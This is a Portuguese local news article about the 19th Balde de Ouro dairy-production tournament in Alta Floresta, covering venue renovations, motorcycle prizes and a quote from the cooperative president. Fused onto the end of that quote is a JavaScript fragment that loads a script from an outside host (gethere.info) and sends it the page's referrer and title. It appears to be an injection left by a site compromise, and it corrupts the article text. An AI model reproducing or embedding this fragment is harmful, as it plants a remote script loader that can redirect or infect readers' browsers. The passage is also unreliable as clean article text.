Capa / Em Destaque / Torneio Balde de Ouro Traz Novidades em sua 19ª Edição

Torneio Balde de Ouro Traz Novidades em sua 19ª Edição

Renan Nery

Nos dias 25 e 29 de maio será realizado o 19º torneio Balde de Ouro nas dependências do parque de Exposição de Alta Floresta, o torneio este ano tem expectativas de superar a edição anterior.
O ambiente foi reformado e ampliado para maior conforto dos participantes, foram feitas alterações nos almoxarifados, e ampliada a área de lazer, que está com nova cobertura e churrasqueira para as atividades festivas.
O Torneio Balde de Ouro é um evento que procura incentivar a produção leiteira no município, diariamente são recolhidos mais de 50 litros de leite.
A 19ª edição do torneio tem como premiação 2 motos, uma para cada categoria, vaca e novilha, 30 produtores já se inscreveram para participar do torneio.
“O Objetivo deste torneio é incentivar os produtores e instrui-los a ampliar a produção de leite, aqui só temos amizades, todos são bem vindos a participar, gostamos de passar esta nova visão sobre a produção de leite para os moradores do campo, ampliando o comércio local e assim tendo um leite de maior qualidade para o consumo da população do município.” falou Presidente da Cooperação Balde de Ouro, Jair Batista.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top